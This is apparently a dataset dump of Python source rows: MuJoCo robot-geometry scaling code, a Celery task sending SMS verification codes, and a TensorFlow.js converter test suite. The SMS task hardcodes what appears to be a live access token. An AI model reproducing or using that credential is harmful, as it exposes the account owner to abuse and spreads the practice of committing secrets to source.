p, new_params):\n pass\n\n def update_xml(self):\n pass\n\n def update(self, new_params):\n self.set_params(new_params)\n self.update_xml()\n\n def get_smallest_z(self):\n pass\n\n def get_param_limits(self):\n pass\n\n def get_param_names(self):\n pass\n\n def get_volume(self):\n pass\n\nclass Sphere(Geom):\n min_radius = .05\n max_radius = .4\n\n def __init__(self, geom):\n self.xml = geom\n self.params = [float(self.xml.get('size'))] # radius\n self.center = np.array([float(x) for x in self.xml.get('pos').split()])\n\n def update_point(self, p, new_params):\n return ((p - self.center) * new_params[0] / self.params[0]) + self.center\n\n def update_xml(self):\n self.xml.set('size', str(self.params[0]))\n\n def get_smallest_z(self):\n return self.center[2] - self.params[0]\n\n def get_param_limits(self):\n return [[self.min_radius], [self.max_radius]]\n\n def get_param_names(self):\n return ['radius']\n\n def get_volume(self):\n return 4./3. * np.pi * self.params[0] ** 3\n\nclass Capsule(Geom):\n min_length = 0.175\n max_length = 0.8\n min_radius = 0.035\n max_radius = 0.085\n\n def __init__(self, geom):\n self.xml = geom\n fromto = [float(x) for x in self.xml.get('fromto').split()]\n self.p1 = np.array(fromto[:3])\n self.p2 = np.array(fromto[3:])\n length = np.sqrt(np.sum((self.p2 - self.p1) ** 2))\n radius = float(self.xml.get('size'))\n self.params = [length, radius]\n self.axis = (self.p2 - self.p1) / length\n\n def update_point(self, p, new_params):\n lfac = p.dot(self.axis) * self.axis\n rfac = p - lfac\n return p + lfac * (-1.0 + new_params[0] / self.params[0])# + rfac * (new_params[1] / self.params[1])\n\n def update_xml(self):\n self.xml.set('fromto', ' '.join([str(x) for x in np.concatenate([self.p1, self.p2])]))\n self.xml.set('size', str(self.params[1])) # radius\n\n def set_params(self, new_params):\n p1 = self.update_point(self.p1, new_params)\n p2 = self.update_point(self.p2, new_params)\n # update only after computing p1, p2\n self.p1 = p1\n self.p2 = p2\n super().set_params(new_params)\n\n def get_smallest_z(self):\n return min(self.p1[2], self.p2[2]) - self.params[1]\n\n def get_param_limits(self):\n return [[self.min_length, self.min_radius], [self.max_length, self.max_radius]]\n\n def get_param_names(self):\n return ['length','radius']\n\n def get_volume(self):\n return 4./3. * np.pi * self.params[1]**3 + self.params[0] * np.pi * self.params[1]**2\n\nclass Body:\n geoms = {'sphere': Sphere, 'capsule': Capsule} # dictionary of legal geometry types\n\n def __init__(self, body, worldbody=False):\n self.xml = body\n self.worldbody = worldbody\n\n geom_xml = body.find('geom') # assume only one geometry per body\n self.geom = self.geoms[geom_xml.get('type')](geom_xml)\n self.joints = [j for j in body.findall('joint') if 'ignore' not in j.get('name')]\n self.parts = [Body(b) for b in body.findall('body')]\n pos = [b.get('pos') for b in body.findall('body')]\n self.part_positions = [np.array([float(x) for x in p.split()]) for p in pos]\n pos = [j.get('pos') for j in self.joints]\n self.joint_positions = [np.array([float(x) for x in p.split()]) for p in pos]\n self.n = len(self.geom.get_params())\n self.n_all_params = len(self.get_params())\n\n self.zmin = float(self.xml.get(\"pos\").split()[2]) - self.get_height()\n\n def get_height(self):\n max_height = -self.geom.get_smallest_z()\n for body, pos in zip(self.parts, self.part_positions):\n max_height = max(max_height, body.get_height() - pos[2])\n return max_height\n\n def update_initial_position(self):\n pos = self.xml.get(\"pos\").split()\n pos[2] = str(self.get_height() + self.zmin)\n self.xml.set(\"pos\", ' '.join(pos))\n\n def update_xml(self):\n for body, pos in zip(self.parts, self.part_positions):\n body.xml.set('pos', ' '.join([str(x) for x in pos]))\n\n for joint, pos in zip(self.joints, self.joint_positions):\n joint.set('pos', ' '.join([str(x) for x in pos]))\n\n def set_body_positions(self, new_params):\n for i, pos in enumerate(self.part_positions):\n self.part_positions[i] = self.geom.update_point(pos, new_params)\n for i, pos in enumerate(self.joint_positions):\n self.joint_positions[i] = self.geom.update_point(pos, new_params)\n\n def update(self, new_params):\n self.set_body_positions(new_params)\n self.geom.update(new_params)\n self.update_xml()\n\n def get_params(self):\n params = self.geom.get_params()\n for body in self.parts:\n params += body.get_params()\n return params\n\n def get_param_limits(self):\n limits = self.geom.get_param_limits()\n for body in self.parts:\n body_limits = body.get_param_limits()\n limits[0] += body_limits[0]\n limits[1] += body_limits[1]\n return limits\n\n def get_param_names(self):\n name = self.xml.get('name')\n param_names = [name + '-' + p for p in self.geom.get_param_names()]\n for body in self.parts:\n param_names += body.get_param_names()\n return param_names\n\n def update_params(self, new_params):\n if self.worldbody: assert len(new_params) == self.n_all_params, \"Wrong number of parameters\"\n self.update(new_params[:self.n])\n remaining_params = new_params[self.n:]\n for body in self.parts:\n remaining_params = body.update_params(remaining_params)\n if self.worldbody:\n self.update_initial_position()\n else:\n return remaining_params\n\n def get_body_names(self):\n names = [self.xml.get('name')]\n for body in self.parts:\n names += body.get_names()\n return names\n\n def get_joints(self):\n joints = {}\n for body,pos in zip(self.parts, self.part_positions):\n for j in body.joints:\n joints[j.get('name')] = (self.xml.get('name'), body.xml.get('name'), self.geom, body.geom, pos)\n joints.update(body.get_joints())\n return joints\n\n def get_volumes(self):\n volumes = {}\n if len(self.joints) > 0:\n for j in self.joints:\n v1 = self.geom.get_volume()\n v2 = sum([b.geom.get_volume() for b in self.parts])\n volumes[j.get('name')] = np.array((v1, v2))\n for body in self.parts:\n volumes.update(body.get_volumes())\n return volumes\n\n\nclass MuJoCoXmlRobot:\n def __init__(self, model_xml):\n self.model_xml = model_xml\n self.tree = ET.parse(self.model_xml)\n worldbody = self.tree.getroot().find('worldbody')\n self.body = Body(worldbody.find('body'), worldbody=True)\n\n def get_params(self):\n return self.body.get_params()\n\n def get_param_limits(self):\n return self.body.get_param_limits()\n\n def get_param_names(self):\n return self.body.get_param_names()\n\n def get_height(self):\n return self.body.get_height()\n\n def get_joints(self):\n return self.body.get_joints()\n\n def get_volumes(self):\n return self.body.get_volumes()\n\n def update(self, params, xml_file=None):\n if xml_file is None:\n xml_file = self.model_xml\n self.body.update_params(list(params))\n self.tree.write(xml_file)\n\nif __name__ == '__main__':\n robot = MuJoCoXmlRobot('mujoco_assets/hopper.xml')\n params = list(1.0 * np.array(robot.get_params()))\n robot.update(params, 'mujoco_assets/hopper_test.xml')\n assert robot.get_params() == params\n #assert robot.get_height() == 1.31\n print(robot.get_param_limits())\n print(robot.get_param_names())\n\n robot = MuJoCoXmlRobot('mujoco_assets/walker2d.xml')\n params = [.4,.04,.5,.05,.55,.055,.6,.06,.5,.05,.55,.055,.6,.06]\n robot.update(params, 'mujoco_assets/walker2d_test.xml')\n assert robot.get_params() == params\n assert robot.get_height() == 1.31\n print(robot.get_param_limits())\n print(robot.get_param_names())\n\n robot = MuJoCoXmlRobot('mujoco_assets/ant.xml')\n params = [.2, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06, .2,.06,.2,.06,.4,.06]\n robot.update(params, 'mujoco_assets/ant_test.xml')\n assert robot.get_params() == params\n assert robot.get_height() == .2\n print(robot.get_param_limits())\n print(robot.get_param_names())\n\n robot = MuJoCoXmlRobot('mujoco_assets/humanoid.xml')\n params = list(.8 * np.array(robot.get_params()))\n robot.update(params, 'mujoco_assets/humanoid_test.xml')\n assert robot.get_params() == params\n print(robot.get_height())\n #assert robot.get_height() == .6085\n print(robot.get_param_limits())\n print(robot.get_param_names())\n\n import gym, roboschool\n env = gym.make(\"RoboschoolHopper-v1\")\n env.unwrapped.model_xml = 'mujoco_assets/hopper_test.xml'\n env.reset()\n #env.render()\n import os\n from scipy.misc import imsave\n import subprocess as sp\n outdir = 'xml_vid'\n os.makedirs(outdir, exist_ok=True)\n i = 0\n for _ in range(10):\n env.reset()\n for _ in range(100):\n env.step(env.action_space.sample())\n rgb = env.render('rgb_array')\n imsave(os.path.join(outdir, '{:05d}.png'.format(i)), rgb)\n i+=1\n sp.call(['ffmpeg', '-r', '60', '-f', 'image2', '-i', os.path.join(outdir, '%05d.png'), '-vcodec', 'libx264', '-pix_fmt', 'yuv420p', os.path.join(outdir, 'out.mp4')])\n env.close()\n"},"apis":{"kind":"list like","value":["xml.etree.ElementTree.parse","os.makedirs","os.path.join","numpy.sum","numpy.array","numpy.concatenate","gym.make"],"string":"[\n \"xml.etree.ElementTree.parse\",\n \"os.makedirs\",\n \"os.path.join\",\n \"numpy.sum\",\n \"numpy.array\",\n \"numpy.concatenate\",\n \"gym.make\"\n]"},"extract_api":{"kind":"string","value":"[((9394, 9425), 'gym.make', 'gym.make', (['\"\"\"RoboschoolHopper-v1\"\"\"'], {}), \"('RoboschoolHopper-v1')\\n\", (9402, 9425), False, 'import gym, roboschool\\n'), ((9625, 9659), 'os.makedirs', 'os.makedirs', (['outdir'], {'exist_ok': '(True)'}), '(outdir, exist_ok=True)\\n', (9636, 9659), False, 'import os\\n'), ((1671, 1691), 'numpy.array', 'np.array', (['fromto[:3]'], {}), '(fromto[:3])\\n', (1679, 1691), True, 'import numpy as np\\n'), ((1710, 1730), 'numpy.array', 'np.array', (['fromto[3:]'], {}), '(fromto[3:])\\n', (1718, 1730), True, 'import numpy as np\\n'), ((7208, 7232), 'xml.etree.ElementTree.parse', 'ET.parse', (['self.model_xml'], {}), '(self.model_xml)\\n', (7216, 7232), True, 'import xml.etree.ElementTree as ET\\n'), ((1756, 1788), 'numpy.sum', 'np.sum', (['((self.p2 - self.p1) ** 2)'], {}), '((self.p2 - self.p1) ** 2)\\n', (1762, 1788), True, 'import numpy as np\\n'), ((9977, 10009), 'os.path.join', 'os.path.join', (['outdir', '\"\"\"%05d.png\"\"\"'], {}), \"(outdir, '%05d.png')\\n\", (9989, 10009), False, 'import os\\n'), ((10056, 10087), 'os.path.join', 'os.path.join', (['outdir', '\"\"\"out.mp4\"\"\"'], {}), \"(outdir, 'out.mp4')\\n\", (10068, 10087), False, 'import os\\n'), ((6973, 6991), 'numpy.array', 'np.array', (['(v1, v2)'], {}), '((v1, v2))\\n', (6981, 6991), True, 'import numpy as np\\n'), ((2228, 2262), 'numpy.concatenate', 'np.concatenate', (['[self.p1, self.p2]'], {}), '([self.p1, self.p2])\\n', (2242, 2262), True, 'import numpy as np\\n')]"}}},{"rowIdx":732,"cells":{"code":{"kind":"string","value":"from ronglian_sms_sdk import SmsSDK\nfrom celery_tasks.main import app\n# 写我们的任务(函数)\n# 任务必须要celery的实例对象装饰器task装饰\n# 任务包的任务需要celery调用自检检查函数。(在main里面写。)\n\n@app.task\ndef celery_send_sms_code(mobile, sms_code):\n accId = ''\n accToken = '514a8783b8c2481ebbeb6a814434796f'\n appId = ''\n\n # 9.1. 创建荣联云 实例对象\n sdk = SmsSDK(accId, accToken, appId)\n tid = '1' # 我们发送短信的模板,值 只能是 1 因为我们是测试用户\n mobile = '%s' % mobile # '手机号1,手机号2' 给哪些手机号发送验证码,只能是测试手机号\n datas = (sms_code, 10) # ('变量1', '变量2') 涉及到模板的变量\n # 您的验证码为{1},请于{2} 分钟内输入\n # 您的验证码为666999,请于5 分钟内输入\n # 9.2. 发送短信\n sdk.sendMessage(tid, mobile, datas)"},"apis":{"kind":"list like","value":["ronglian_sms_sdk.SmsSDK"],"string":"[\n \"ronglian_sms_sdk.SmsSDK\"\n]"},"extract_api":{"kind":"string","value":"[((326, 356), 'ronglian_sms_sdk.SmsSDK', 'SmsSDK', (['accId', 'accToken', 'appId'], {}), '(accId, accToken, appId)\\n', (332, 356), False, 'from ronglian_sms_sdk import SmsSDK\\n')]"}}},{"rowIdx":733,"cells":{"code":{"kind":"string","value":"# Copyright 2018 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Test the Python API and shell binary of the tensorflowjs pip package.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport glob\nimport json\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nimport unittest\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow import keras\nfrom tensorflow.python.eager import def_function\nfrom tensorflow.python.framework import constant_op\nfrom tensorflow.python.framework import dtypes\nfrom tensorflow.python.framework import tensor_spec\nfrom tensorflow.python.ops import variables\nfrom tensorflow.python.training.tracking import tracking\nfrom tensorflow.python.saved_model.save import save\nimport tensorflow_hub as hub\n\nimport tensorflowjs as tfjs\n\n\ndef _createKerasModel(layer_name_prefix, h5_path=None):\n \"\"\"Create a Keras model for testing.\n\n Args:\n layer_name_prefix: A prefix string for layer names. This helps avoid\n clashes in layer names between different test methods.\n h5_path: Optional string path for a HDF5 (.h5) file to save the model\n in.\n\n Returns:\n An instance of keras.Model.\n \"\"\"\n input_tensor = keras.layers.Input((3, ))\n dense1 = keras.layers.Dense(\n 4,\n use_bias=True,\n kernel_initializer='ones',\n bias_initializer='zeros',\n name=layer_name_prefix + '1')(input_tensor)\n output = keras.layers.Dense(\n 2,\n use_bias=False,\n kernel_initializer='ones',\n name=layer_name_prefix + '2')(dense1)\n model = keras.models.Model(inputs=[input_tensor], outputs=[output])\n if h5_path:\n model.save(h5_path)\n return model\n\ndef _createTensorFlowSavedModelV1(name_scope, save_path):\n \"\"\"Create a TensorFlow SavedModel for testing.\n Args:\n name_scope: Name scope to create the model under. This helps avoid\n op and variable name clashes between different test methods.\n save_path: The directory path in which to save the model.\n \"\"\"\n graph = tf.Graph()\n with graph.as_default():\n with tf.compat.v1.name_scope(name_scope):\n x = tf.compat.v1.constant([[37.0, -23.0], [1.0, 4.0]])\n w = tf.compat.v1.get_variable('w', shape=[2, 2])\n y = tf.compat.v1.matmul(x, w)\n output = tf.compat.v1.nn.softmax(y)\n init_op = w.initializer\n\n # Create a builder.\n builder = tf.compat.v1.saved_model.builder.SavedModelBuilder(save_path)\n\n with tf.compat.v1.Session() as sess:\n # Run the initializer on `w`.\n sess.run(init_op)\n\n builder.add_meta_graph_and_variables(\n sess, [tf.compat.v1.saved_model.tag_constants.SERVING],\n signature_def_map={\n \"serving_default\":\n tf.compat.v1.saved_model.signature_def_utils.predict_signature_def(\n inputs={\"x\": x},\n outputs={\"output\": output})\n },\n assets_collection=None)\n\n builder.save()\n\ndef _createTensorFlowSavedModel(name_scope, save_path):\n \"\"\"Create a TensorFlow SavedModel for testing.\n\n Args:\n name_scope: Name scope to create the model under. This helps avoid\n op and variable name clashes between different test methods.\n save_path: The directory path in which to save the model.\n \"\"\"\n\n input_data = constant_op.constant(1., shape=[1])\n root = tracking.AutoTrackable()\n root.v1 = variables.Variable(3.)\n root.v2 = variables.Variable(2.)\n root.f = def_function.function(lambda x: root.v1 * root.v2 * x)\n to_save = root.f.get_concrete_function(input_data)\n\n save(root, save_path, to_save)\n\n\ndef _create_hub_module(save_path):\n \"\"\"Create a TensorFlow Hub module for testing.\n\n Args:\n save_path: The directory path in which to save the model.\n \"\"\"\n # Module function that doubles its input.\n def double_module_fn():\n w = tf.Variable([2.0, 4.0])\n x = tf.compat.v1.placeholder(dtype=tf.float32)\n hub.add_signature(inputs=x, outputs=x*w)\n graph = tf.Graph()\n with graph.as_default():\n spec = hub.create_module_spec(double_module_fn)\n m = hub.Module(spec)\n # Export the module.\n with tf.compat.v1.Session(graph=graph) as sess:\n sess.run(tf.compat.v1.global_variables_initializer())\n m.export(save_path, sess)\n\nclass APIAndShellTest(tf.test.TestCase):\n \"\"\"Tests for the Python API of the pip package.\"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.class_tmp_dir = tempfile.mkdtemp()\n cls.tf_saved_model_dir = os.path.join(cls.class_tmp_dir, 'tf_saved_model')\n cls.tf_saved_model_v1_dir = os.path.join(\n cls.class_tmp_dir, 'tf_saved_model_v1')\n _createTensorFlowSavedModel('a', cls.tf_saved_model_dir)\n _createTensorFlowSavedModelV1('b', cls.tf_saved_model_v1_dir)\n cls.tf_hub_module_dir = os.path.join(cls.class_tmp_dir, 'tf_hub_module')\n _create_hub_module(cls.tf_hub_module_dir)\n\n @classmethod\n def tearDownClass(cls):\n shutil.rmtree(cls.class_tmp_dir)\n\n def setUp(self):\n # Make sure this file is not being run from the source directory, to\n # avoid picking up source files.\n if os.path.isdir(\n os.path.join(os.path.dirname(__file__), 'tensorflowjs')):\n self.fail('Do not run this test from the Python source directory. '\n 'This file is intended to be run on pip install.')\n\n self._tmp_dir = tempfile.mkdtemp()\n super(APIAndShellTest, self).setUp()\n\n def tearDown(self):\n if os.path.isdir(self._tmp_dir):\n shutil.rmtree(self._tmp_dir)\n super(APIAndShellTest, self).tearDown()\n\n def testVersionString(self):\n self.assertEqual(2, tfjs.__version__.count('.'))\n\n def testSaveKerasModel(self):\n with self.test_session():\n # First create a toy keras model.\n model = _createKerasModel('MergedDense')\n\n tfjs.converters.save_keras_model(model, self._tmp_dir)\n\n # Briefly check the model topology.\n with open(os.path.join(self._tmp_dir, 'model.json')) as f:\n json_content = json.load(f)\n model_json = json_content['modelTopology']\n self.assertIsInstance(model_json['model_config'], dict)\n self.assertIsInstance(model_json['model_config']['config'], dict)\n self.assertIn('layers', model_json['model_config']['config'])\n\n weights_manifest = json_content['weightsManifest']\n self.assertIsInstance(weights_manifest, list)\n\n # Briefly check the weights manifest.\n weight_shapes = dict()\n weight_dtypes = dict()\n for manifest_item in weights_manifest:\n for weight in manifest_item['weights']:\n weight_name = weight['name']\n weight_shapes[weight_name] = weight['shape']\n weight_dtypes[weight_name] = weight['dtype']\n\n self.assertEqual(\n sorted(list(weight_shapes.keys())),\n sorted([\n 'MergedDense1/kernel', 'MergedDense1/bias',\n 'MergedDense2/kernel'\n ]))\n self.assertEqual(weight_shapes['MergedDense1/kernel'], [3, 4])\n self.assertEqual(weight_shapes['MergedDense1/bias'], [4])\n self.assertEqual(weight_shapes['MergedDense2/kernel'], [4, 2])\n self.assertEqual(weight_dtypes['MergedDense1/kernel'], 'float32')\n self.assertEqual(weight_dtypes['MergedDense1/bias'], 'float32')\n self.assertEqual(weight_dtypes['MergedDense2/kernel'], 'float32')\n\n def testLoadKerasModel(self):\n # Use separate tf.Graph and tf.compat.v1.Session contexts to prevent name collision.\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # First create a toy keras model.\n model1 = _createKerasModel('MergedDense')\n tfjs.converters.save_keras_model(model1, self._tmp_dir)\n model1_weight_values = model1.get_weights()\n\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # Load the model from saved artifacts.\n model2 = tfjs.converters.load_keras_model(\n os.path.join(self._tmp_dir, 'model.json'))\n\n # Compare the loaded model with the original one.\n model2_weight_values = model2.get_weights()\n self.assertEqual(len(model1_weight_values), len(model2_weight_values))\n for model1_weight_value, model2_weight_value in zip(\n model1_weight_values, model2_weight_values):\n self.assertAllClose(model1_weight_value, model2_weight_value)\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(self._tmp_dir, 'group*-*')))\n\n def testInvalidInputFormatRaisesError(self):\n process = subprocess.Popen(\n [\n 'tensorflowjs_converter', '--input_format',\n 'nonsensical_format', self._tmp_dir, self._tmp_dir\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, stderr = process.communicate()\n self.assertGreater(process.returncode, 0)\n self.assertIn(b'--input_format', tf.compat.as_bytes(stderr))\n\n def testMissingInputPathRaisesError(self):\n process = subprocess.Popen(\n [\n 'tensorflowjs_converter'\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, stderr = process.communicate()\n self.assertGreater(process.returncode, 0)\n self.assertIn(b'input_path', tf.compat.as_bytes(stderr))\n\n def testKerasH5ConversionWorksFromCLI(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # First create a toy keras model.\n os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))\n h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')\n _createKerasModel('MergedDenseForCLI', h5_path)\n\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras', h5_path,\n self._tmp_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # Briefly check the model topology.\n with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:\n json_content = json.load(f)\n model_json = json_content['modelTopology']\n self.assertIsInstance(model_json['model_config'], dict)\n self.assertIsInstance(model_json['model_config']['config'], dict)\n self.assertIn('layers', model_json['model_config']['config'])\n\n weights_manifest = json_content['weightsManifest']\n self.assertIsInstance(weights_manifest, list)\n\n # Briefly check the weights manifest.\n weight_shapes = dict()\n weight_dtypes = dict()\n for manifest_item in weights_manifest:\n for weight in manifest_item['weights']:\n weight_name = weight['name']\n weight_shapes[weight_name] = weight['shape']\n weight_dtypes[weight_name] = weight['dtype']\n\n self.assertEqual(\n sorted(list(weight_shapes.keys())),\n sorted([\n 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',\n 'MergedDenseForCLI2/kernel'\n ]))\n self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])\n self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])\n self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])\n self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')\n self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')\n self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')\n\n # Verify that there is only one weight group due to the default\n # non-split_weights_by_layer behavior. The model is a small one, which\n # does not exceed the 4-MB shard size limit. Therefore, there should\n # be only one weight file.\n self.assertEqual(\n 1, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))\n\n def testKerasH5ConversionSplitWeightsByLayerWorksFromCLI(self):\n with tf.Graph().as_default(), tf.compat.v1.Session():\n # First create a toy keras model.\n os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))\n h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')\n _createKerasModel('MergedDenseForCLI', h5_path)\n\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras',\n '--split_weights_by_layer', h5_path, self._tmp_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # Briefly check the model topology.\n with open(os.path.join(self._tmp_dir, 'model.json'), 'rt') as f:\n json_content = json.load(f)\n model_json = json_content['modelTopology']\n self.assertIsInstance(model_json['model_config'], dict)\n self.assertIsInstance(model_json['model_config']['config'], dict)\n self.assertIn('layers', model_json['model_config']['config'])\n\n weights_manifest = json_content['weightsManifest']\n self.assertIsInstance(weights_manifest, list)\n\n # Briefly check the weights manifest.\n weight_shapes = dict()\n weight_dtypes = dict()\n for manifest_item in weights_manifest:\n for weight in manifest_item['weights']:\n weight_name = weight['name']\n weight_shapes[weight_name] = weight['shape']\n weight_dtypes[weight_name] = weight['dtype']\n\n self.assertEqual(\n sorted(list(weight_shapes.keys())),\n sorted([\n 'MergedDenseForCLI1/kernel', 'MergedDenseForCLI1/bias',\n 'MergedDenseForCLI2/kernel'\n ]))\n self.assertEqual(weight_shapes['MergedDenseForCLI1/kernel'], [3, 4])\n self.assertEqual(weight_shapes['MergedDenseForCLI1/bias'], [4])\n self.assertEqual(weight_shapes['MergedDenseForCLI2/kernel'], [4, 2])\n self.assertEqual(weight_dtypes['MergedDenseForCLI1/kernel'], 'float32')\n self.assertEqual(weight_dtypes['MergedDenseForCLI1/bias'], 'float32')\n self.assertEqual(weight_dtypes['MergedDenseForCLI2/kernel'], 'float32')\n\n # Verify that there are two weight groups due to the optional flag\n # --split_weights_by_layer behavior. The model is a small one. None of\n # the layers should have weight sizes exceeding the 4-MB shard size\n # limit.\n self.assertEqual(\n 2, len(glob.glob(os.path.join(self._tmp_dir, 'group*'))))\n\n def testKerasH5ConversionWithSignatureNameErrors(self):\n process = subprocess.Popen(\n [\n 'tensorflowjs_converter', '--input_format', 'keras',\n '--signature_name', 'bar',\n os.path.join(self._tmp_dir, 'foo.h5'),\n os.path.join(self._tmp_dir, 'output')\n ],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE)\n _, stderr = process.communicate()\n self.assertGreater(process.returncode, 0)\n self.assertIn(\n b'The --signature_name flag is applicable only to',\n tf.compat.as_bytes(stderr))\n\n def testConvertTFSavedModelV1WithCommandLineWorks(self):\n output_dir = os.path.join(self._tmp_dir)\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model',\n self.tf_saved_model_v1_dir, output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n weights = [{\n 'paths': ['group1-shard1of1.bin'],\n 'weights': [{'dtype': 'float32', 'name': 'w', 'shape': [2, 2]}]}]\n\n # Load the saved weights as a JSON string.\n output_json = json.load(\n open(os.path.join(output_dir, 'model.json'), 'rt'))\n self.assertEqual(output_json['weightsManifest'], weights)\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))\n\n\n def testConvertTFHubModuleWithCommandLineWorks(self):\n output_dir = os.path.join(self._tmp_dir)\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n weights = [{\n 'paths': ['group1-shard1of1.bin'],\n 'weights': [{\n 'shape': [2],\n 'name': 'module/Variable',\n 'dtype': 'float32'\n }]\n }]\n # Load the saved weights as a JSON string.\n output_json = json.load(\n open(os.path.join(output_dir, 'model.json'), 'rt'))\n self.assertEqual(output_json['weightsManifest'], weights)\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))\n\n def testConvertTFSavedModelWithCommandLineWorks(self):\n output_dir = os.path.join(self._tmp_dir)\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tf_saved_model',\n '--output_format', 'tfjs_graph_model',\n self.tf_saved_model_dir, output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n weights = [{\n 'paths': ['group1-shard1of1.bin'],\n 'weights': [{\n 'dtype': 'float32',\n 'shape': [],\n 'name': 'StatefulPartitionedCall/mul'\n }]\n }]\n\n # Load the saved weights as a JSON string.\n output_json = json.load(\n open(os.path.join(output_dir, 'model.json'), 'rt'))\n weights_manifest = output_json['weightsManifest']\n self.assertEqual(len(weights_manifest), len(weights))\n if sys.version_info[0] < 3:\n self.assertItemsEqual(weights_manifest[0]['paths'],\n weights[0]['paths'])\n self.assertItemsEqual(weights_manifest[0]['weights'],\n weights[0]['weights'])\n else:\n self.assertCountEqual(weights_manifest[0]['paths'],\n weights[0]['paths'])\n self.assertCountEqual(weights_manifest[0]['weights'],\n weights[0]['weights'])\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))\n\n def testConvertTFHubModuleWithCommandLineWorks(self):\n output_dir = os.path.join(self._tmp_dir)\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tf_hub',\n self.tf_hub_module_dir, output_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n weights = [{\n 'paths': ['group1-shard1of1.bin'],\n 'weights': [{\n 'shape': [2],\n 'name': 'module/Variable',\n 'dtype': 'float32'\n }]\n }]\n # Load the saved weights as a JSON string.\n output_json = json.load(\n open(os.path.join(output_dir, 'model.json'), 'rt'))\n self.assertEqual(output_json['weightsManifest'], weights)\n\n # Check the content of the output directory.\n self.assertTrue(glob.glob(os.path.join(output_dir, 'group*-*')))\n\n def testConvertTensorflowjsArtifactsToKerasH5(self):\n # 1. Create a toy keras model and save it as an HDF5 file.\n os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))\n h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')\n with tf.Graph().as_default(), tf.compat.v1.Session():\n model = _createKerasModel('MergedDenseForCLI', h5_path)\n model_json = model.to_json()\n\n # 2. Convert the HDF5 file to tensorflowjs format.\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras', h5_path,\n self._tmp_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. Convert the tensorflowjs artifacts back to HDF5.\n new_h5_path = os.path.join(self._tmp_dir, 'model_2.h5')\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'tfjs_layers_model',\n '--output_format', 'keras',\n os.path.join(self._tmp_dir, 'model.json'), new_h5_path])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 4. Load the model back from the new HDF5 file and compare with the\n # original model.\n with tf.Graph().as_default(), tf.compat.v1.Session():\n model_2 = keras.models.load_model(new_h5_path)\n model_2_json = model_2.to_json()\n self.assertEqual(model_json, model_2_json)\n\n def testLoadTensorflowjsArtifactsAsKerasModel(self):\n # 1. Create a toy keras model and save it as an HDF5 file.\n os.makedirs(os.path.join(self._tmp_dir, 'keras_h5'))\n h5_path = os.path.join(self._tmp_dir, 'keras_h5', 'model.h5')\n with tf.Graph().as_default(), tf.compat.v1.Session():\n model = _createKerasModel('MergedDenseForCLI', h5_path)\n model_json = model.to_json()\n\n # 2. Convert the HDF5 file to tensorflowjs format.\n process = subprocess.Popen([\n 'tensorflowjs_converter', '--input_format', 'keras', h5_path,\n self._tmp_dir\n ])\n process.communicate()\n self.assertEqual(0, process.returncode)\n\n # 3. Load the tensorflowjs artifacts as a keras.Model instance.\n with tf.Graph().as_default(), tf.compat.v1.Session():\n model_2 = tfjs.converters.load_keras_model(\n os.path.join(self._tmp_dir, 'model.json'))\n model_2_json = model_2.to_json()\n 